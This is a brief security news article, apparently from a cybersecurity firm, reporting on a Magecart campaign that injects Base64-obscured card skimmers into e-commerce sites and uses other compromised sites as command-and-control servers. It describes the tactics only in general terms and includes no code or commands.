HQ/EMEAFind out how we can help your business
A new Magecart campaign has targeted legitimate e-commerce websites aiming to steal PII and credit card information. Currently, the confirmed websites these threat actors targets come from Europe, Latin America, and North America.
According to researchers, the attackers could establish their command-and-control infrastructure on legitimate websites in this new operation. The threat actors allegedly exploited well-known flaws to initiate infection campaigns.
The new Magecart campaign uses the hacked websites as command-and-control servers.
The Magecart campaign operators will hack a legitimate website using a vulnerability to start their cybercriminal activity. These websites will serve as the actors’ command-and-control servers once they have successfully compromised them.
The threat actors can also bypassed security detections and work around standard defences by exploiting these reputable websites. Hence, they do not need to establish their independent infrastructure.
The threat actors inject a JavaScript snippet into their targeted e-commerce websites. Subsequently, the snippet will recover the malicious codes from previously infected sites.
Furthermore, these miscreants have adopted Base64 encoding to hide their credit card skimmer to further upgrade their attacks’ stealthiness. This encoding tactic employs a structure that resembles well-known third-party services, such as GTM or Facebook Pix, while concealing the URL of the host.
Cybersecurity experts noted that this cybercriminal campaign prioritises targeting commerce organisations, which could significantly threaten many businesses since some victim entities receive a monthly traffic flow that reaches thousands.
Hence, this operation could endanger thousands of individuals since their credit card data and PII are dangling at the actors’ faces. These web skimming campaigns pose a significant threat to digital commerce organisations. The impacts could be massive because targeted organisations could lose their reputations and be prone to other attacks.
This newly discovered campaign reminds everyone in e-commerce and organisations that web skimmers are a significant security threat. Furthermore, these actors constantly evolve and adapt tactics to hide their activities and make security detections irrelevant.
Organisations should know that standard static analysis tools are not substantial in combating web skimmers since these attackers constantly alter their methods and adopt sophisticated tactics.
